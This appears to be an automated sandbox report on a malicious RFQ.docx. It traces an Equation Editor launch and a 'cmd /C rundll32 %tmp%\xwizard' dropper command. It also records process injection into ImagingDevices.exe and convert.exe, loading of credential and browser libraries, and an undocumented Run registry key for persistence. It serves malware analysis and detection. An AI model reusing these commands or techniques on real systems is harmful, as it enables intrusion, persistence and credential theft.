              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C
              Source: convert.exe, 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.11.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: convert.exe, 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: convert.exe, 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.11.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: convert.exe, 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: convert.exe, 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.11.drBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: convert.exe, 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: convert.exe, 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp, sqlite3.dll.11.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: RFQ.docxReversingLabs: Detection: 15%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C rundll32 %tmp%\xwizard.,IEX A C
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeProcess created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"
              Source: C:\Windows\SysWOW64\convert.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C rundll32 %tmp%\xwizard.,IEX A CJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A CJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A CJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"Jump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeProcess created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: ifsutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: scecli.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: osuninst.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: mozglue.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: wdscore.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: cryptui.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: riched32.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
              Source: RFQ.LNK.1.drLNK file: ..\..\..\..\..\Desktop\RFQ.docx
              Source: C:\Windows\SysWOW64\convert.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: ImagingDevices.pdb source: convert.exe, 0000000B.00000002.648888514.000000000287C000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 0000000B.00000002.648352209.0000000000200000.00000004.00000020.00020000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000000.510314863.000000000329C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.553400989.000000000126C000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: convert.pdb source: ImagingDevices.exe, 00000009.00000002.497445868.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000A.00000002.648365477.0000000000744000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mVjlVtpvDsvJ.exe, 0000000A.00000002.648477658.000000000126E000.00000002.00000001.01000000.00000004.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000002.648546360.000000000126E000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: wntdll.pdb source: ImagingDevices.exe, ImagingDevices.exe, 00000009.00000003.476693111.0000000000450000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000009.00000002.497469157.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, ImagingDevices.exe, 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, ImagingDevices.exe, 00000009.00000003.477063073.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648597761.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 0000000B.00000003.497780980.0000000001E40000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000003.497414077.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648597761.0000000002150000.00000040.00001000.00020000.00000000.sdmp
              Source: ~WRD0000.tmp.1.drInitial sample: OLE indicators vbamacros = False
              Source: sqlite3.dll.11.drStatic PE information: section name: /4
              Source: sqlite3.dll.11.drStatic PE information: section name: /19
              Source: sqlite3.dll.11.drStatic PE information: section name: /31
              Source: sqlite3.dll.11.drStatic PE information: section name: /45
              Source: sqlite3.dll.11.drStatic PE information: section name: /57
              Source: sqlite3.dll.11.drStatic PE information: section name: /70
              Source: sqlite3.dll.11.drStatic PE information: section name: /81
              Source: sqlite3.dll.11.drStatic PE information: section name: /92
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00411857 push edi; iretd 9_2_0041186A
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00411863 push edi; iretd 9_2_0041186A
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00418065 push cs; ret 9_2_0041806D
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0040E966 push esp; ret 9_2_0040E967
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00415BA3 push ebx; retn 7AC1h9_2_00415CFB
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00403450 push eax; ret 9_2_00403452
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00411C61 push ebp; retf 9_2_00411C62
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0040AC36 push ds; ret 9_2_0040AC37
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00404DB3 push esi; ret 9_2_00404DB4
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00401E45 push FFFFFFEDh; ret 9_2_00401E52
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00404E6A push AFC6F9A9h; retf 9_2_00404E7B
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00401ED9 pushfd ; iretd 9_2_00401EF2
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_004066F7 push eax; ret 9_2_004066FA
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_00414694 push esp; iretd 9_2_00414585
              Source: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exeCode function: 9_2_0088DFA1 push ecx; ret 9_2_0088DFB4
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_0460C424 push cs; ret 10_2_0460C42C
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_04605C16 push edi; iretd 10_2_04605C29
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_04602D25 push esp; ret 10_2_04602D26
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_04613629 push es; retf 10_2_0461362F
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_0460A635 pushad ; ret 10_2_0460A638
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_045FEFF5 push ds; ret 10_2_045FEFF6
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_04606020 push ebp; retf 10_2_04606021
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_045F9172 push esi; ret 10_2_045F9173
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_045F9229 push AFC6F9A9h; retf 10_2_045F923A
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeCode function: 10_2_045FAAB6 push eax; ret 10_2_045FAAB9
              Source: wcC8DC.tmp.6.drStatic PE information: section name: .text entropy: 7.994238159441129
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\xwizardJump to dropped file
              Source: C:\Windows\SysWOW64\convert.exeFile created: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
              Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\wcC8DC.tmpJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\xwizardJump to dropped file

              Boot Survival

              barindex
              Creates an undocumented autostart registry key
              Source: C:\Windows\SysWOW64\convert.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ANPPANJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ANPPANJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ANPPANJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run ANPPANJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Found hidden mapped module (file has been removed from disk)
              Source: C:\Windows\System32\rundll32.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WCC8DC.TMP
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\convert.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
